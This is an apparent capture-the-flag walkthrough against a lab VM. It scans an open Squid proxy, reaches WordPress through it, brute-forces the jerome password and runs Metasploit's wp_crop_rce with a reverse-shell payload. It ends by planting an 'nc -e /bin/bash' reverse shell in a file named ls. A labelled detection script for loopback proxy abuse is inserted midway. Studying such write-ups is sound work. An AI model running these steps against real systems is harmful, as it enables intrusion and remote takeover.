Nmap scan and probing:

╰─ nmap -p1-65535 -sV -A -O -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 10:15 CST
Nmap scan report for
Host is up (0.00091s latency).
Not shown: 65534 closed ports
8080/tcp open http-proxy Squid http proxy 3.5.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: squid/3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:75:E4:B1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop


╰─ searchsploit squid



The Squid version in this example is: <p>Generated Wed, 31 Jul 2019 02:34:31 GMT by jerome (squid/3.5.27)</p>





╰─ dirb -p

---- Scanning URL: ----
+ (CODE:200|SIZE:19)
+ (CODE:200|SIZE:4021)




Port 1337 is open and is running WordPress, so enumerate its directories:

╰─ dirb -p


╰─ wpscan -u --proxy -e u vp 

[!] The WordPress '' file exists exposing a version number
[+] Interesting header: LINK: <http://localhost:1337/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.29 (Ubuntu)
[+] Interesting header: VIA: 1.1 jerome (squid/3.5.27)
[+] Interesting header: X-CACHE: MISS from jerome
[+] Interesting header: X-CACHE-LOOKUP: HIT from jerome:8080
[+] XML-RPC Interface available under:
[!] Upload directory has directory listing enabled:
[!] Includes directory has directory listing enabled:

[+] WordPress version 5.0 (Released on 2018-12-06) identified from links opml, meta generator
[!] 9 vulnerabilities identified from the version number


[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
| Id | Login | Name |
| 1 | root | root |
| 4 | jerome | jerome |

[+] Finished: Wed Jul 31 14:39:16 2019
[+] Requests Done: 644
[+] Memory used: 38.043 MB
[+] Elapsed time: 00:00:04
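
The wpscan headers above (VIA: 1.1 jerome (squid/3.5.27) and a LINK pointing at localhost:1337) show the open proxy relaying requests to a service bound to the loopback interface. The following is an added example, not part of the original walkthrough: a detection pass over Squid's native access.log format that flags clients using the proxy to reach loopback destinations. The log lines, client addresses and function names are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log format (not from the target).
SAMPLE_LOG = """\
1564540471.101     12 192.168.1.50 TCP_MISS/200 4021 GET http://127.0.0.1:1337/wordpress/ - HIER_DIRECT/127.0.0.1 text/html
1564540471.350      3 192.168.1.50 TCP_MISS/503 3900 GET http://127.0.0.1:22/ - HIER_NONE/- text/html
1564540472.010     45 192.168.1.77 TCP_MISS/200 1500 GET http://example.com/index.html - HIER_DIRECT/93.184.216.34 text/html
1564540473.200      9 192.168.1.50 TCP_TUNNEL/200 320 CONNECT localhost:1337 - HIER_DIRECT/127.0.0.1 -
1564540474.000      5 192.168.1.50 TCP_MISS/200 19 GET http://[::1]:80/ - HIER_DIRECT/::1 text/html
garbage line
"""

def dest_host_port(method, target):
    """Return (host, port) of a proxied request; CONNECT targets are host:port."""
    parts = urlsplit(("//" + target) if method == "CONNECT" else target)
    port = parts.port or {"http": 80, "https": 443}.get(parts.scheme, 0)
    return parts.hostname or "", port

def is_loopback(host):
    """True for localhost names and for 127.0.0.0/8 or ::1 literals."""
    if host in ("localhost", "localhost.localdomain"):
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # an ordinary hostname, not an IP literal

def loopback_hits(log_text):
    """Map each client IP to the sorted loopback ports it requested via the proxy."""
    hits = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line
        client, method, target = fields[2], fields[5], fields[6]
        try:
            host, port = dest_host_port(method, target)
        except ValueError:
            continue  # unparsable URL or port
        if is_loopback(host):
            hits.setdefault(client, set()).add(port)
    return {client: sorted(ports) for client, ports in hits.items()}

def port_sweepers(hits, threshold=3):
    """Clients that touched at least `threshold` distinct loopback ports."""
    return sorted(c for c, ports in hits.items() if len(ports) >= threshold)
```

The matching Squid control is `http_access deny to_localhost`, placed before any allow rule, so the proxy refuses loopback destinations outright.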


╰─ wpscan -u --proxy -e u --wordlist /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt


login: jerome and password: jerome



Attempts to upload .php3, .php5, .php.xxx and .php%00.jpg files were unsuccessful.


[!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
Reference: https://wpvulndb.com/vulnerabilities/9222
Reference: https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
Reference: https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
[i] Fixed in: 5.0.1



# apt update; apt install metasploit-framework

msf5 > use exploit/multi/http/wp_crop_rce

msf5 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   jerome           yes       The WordPress password to authenticate with
   Proxies    http:            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      1337             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress       yes       The base path to the wordpress application
   USERNAME   jerome           yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress



jerome@jerome:/var/www/html/wordpress$ cd /home/jerome
cd /home/jerome
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 1234" >> ls
echo "nc -e /bin/bash 1234" >> ls
jerome@jerome:/home/jerome$ chmod 777 ls

